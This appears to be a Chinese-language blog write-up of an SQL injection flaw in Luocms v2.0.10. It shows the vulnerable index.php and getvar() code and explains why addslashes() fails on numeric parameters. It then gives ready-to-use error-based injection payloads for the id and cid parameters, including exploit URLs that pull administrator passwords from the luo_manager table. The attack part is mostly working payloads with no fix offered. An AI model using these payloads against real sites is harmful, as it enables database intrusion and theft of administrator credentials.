Luocms_v2.0.10 duplicate注入

Luocms_v2.0.10

下载地址:http://down.admin5.com/php/24114.html

漏洞文件:Luocms/index.php:

<?php

require_once “inc/const.php”;

$id = getvar(“id”);

$fid = getvar(“fid”);

$cid = getvar(“cid”);

$act = getvar(“act”);

$p = getvar(“p”);

$p = !empty($p) ? $p : 1;

$p_l = new cls_tpl();

$p_l->tpl_main($act,$id,$cid,$sitepath,$p);

?>

看看怎么获取参数的,查看getvar的函数定义,function文件第45-49行:

function getvar($var){

$result = isset($_GET[$var])?$_GET[$var]:$_POST[$var];

$result = addslashes(trim($result));

return $result;

}

可以看到直接从GET方式或者POST方式获取值

trim函数去除两边空格

” ” (ASCII 32 (0x20)),普通空格符。

“\t” (ASCII 9 (0x09)),制表符。

“\n” (ASCII 10 (0x0A)),换行符。

“\r” (ASCII 13 (0x0D)),回车符。

“\0” (ASCII 0 (0x00)),空字节符。

“\x0B” (ASCII 11 (0x0B)),垂直制表符。

addslashes函数转义 ‘、”、\和NULL字符,这样的过滤对数字型来说是无效的,因为不用闭合符号

看看tpl_main函数定义,template.php文件第7-26行:

function tpl_main($act,$id,$cid,$sitepath,$p){

$tpl_addr = $this->get_tpl($act);

$temp = $this->load_tpl($tpl_addr);

$temp = $this->get_include_file($temp);

$temp = $this->get_sys_tag($temp,$id,$cid);

$temp = $this->get_list_tag($temp,$id,$cid,$p);

$temp = $this->get_url_path($temp);

$temp = $this->get_sort_tag($temp,$id,$cid);

$temp = $this->get_title_tag($temp,$id);

$temp = $this->get_sitepath($temp,$act,$id,$cid);

if ($id != “”){

$temp = $this->get_content_content($temp,$id);

$temp = $this->get_prv_next($temp,$id);

}

echo $temp;

}

跟过去看就是一堆调用,直接传值index.php查看mysql执行的语句

构建报错查询:

注入的参数有id、cid

payload:

id=1 AND (SELECT 3567 FROM(SELECT COUNT(*),CONCAT(0x7170766271,(SELECT (ELT(3567=3567,1))),0x71786b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

cid=1 AND (SELECT 3567 FROM(SELECT COUNT(*),CONCAT(0x7170766271,(SELECT (ELT(3567=3567,1))),0x71786b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

exploit:

index.php?cid=1 AND (SELECT 5188 FROM(SELECT COUNT(*),CONCAT(0x71716b7171,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),1,54) FROM luocms.luo_manager ORDER BY id),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

index.php?id=1 AND (SELECT 5188 FROM(SELECT COUNT(*),CONCAT(0x71716b7171,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),1,54) FROM luocms.luo_manager ORDER BY id),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

 

0 条评论
发表一条评论